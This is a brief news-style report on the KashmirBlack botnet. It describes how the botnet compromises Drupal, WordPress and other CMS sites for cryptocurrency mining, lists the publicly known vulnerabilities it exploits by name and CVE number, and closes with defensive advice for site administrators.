The highly-sophisticated botnet is believed to have infected hundreds of thousands of websites by attacking their underlying CMS platforms, according to US-based cyber security firm Imperva , named to be KashmirBlack. The main victims are Drupal, WordPress and its counts
The botnet’s prime purpose appears to infect websites, and then use their servers for cryptocurrency mining.
Hackers based on Indonesia has a base where Command&Control Infrastructure has been placed.
The botnet is the work of a hacker named “Exect1337“, a member of the Indonesian hacker crew PhantomGhost.
“The KashmirBlack C&C has three main roles: Supply a Perl script that infects the victim server with the botnet malicious script, receive reports of findings and attack results from bots and supply bots with attack instructions,” most of the victim site is from US
The KashmirBlack C&C has a scanner that searches for sites running CMS platforms, creates an attack instruction with the newly- found sites, and pushes it into a queue waiting for bots to receive them and attack.
The team found more than 20 distinct exploits.
- PHPUnit Remote Code Execution – CVE-2017-9841
- jQuery file upload vulnerability – CVE-2018-9206
- ELFinder Command Injection – CVE-2019-9194
- Joomla! remote file upload vulnerability
- Magento Local File Inclusion – CVE-2015-2067
- Magento Webforms Upload Vulnerability
- CMS Plupload Arbitrary File Upload
- Yeager CMS vulnerability – CVE-2015-7571
- Multiple vulnerabilities including File Upload & RCE for many plugins in multiple platforms here
- WordPress TimThumb RFI Vulnerability – CVE-2011-4106
- Uploadify RCE vulnerability
- vBulletin Widget RCE – CVE-2019-16759
- WordPress install.php RCE
- WordPress xmlrpc.php Login Brute-Force attack
- WordPress multiple Plugins RCE (see full list here)
- WordPress multiple Themes RCE (see full list here)
- Webdav file upload vulnerabilit
The team advised several actions that should be performed in case your server is infected by the KashmirBlack botnet.
“Kill malicious processes, remove malicious files, remove suspicious and unfamiliar jobs and remove unused plugins and themes”.
The site administrator should ensure the CMS core files and third-party modules are always up-to-date and properly configured.
“Strong and unique passwords are recommended, as they are the first defence against brute force attacks,” .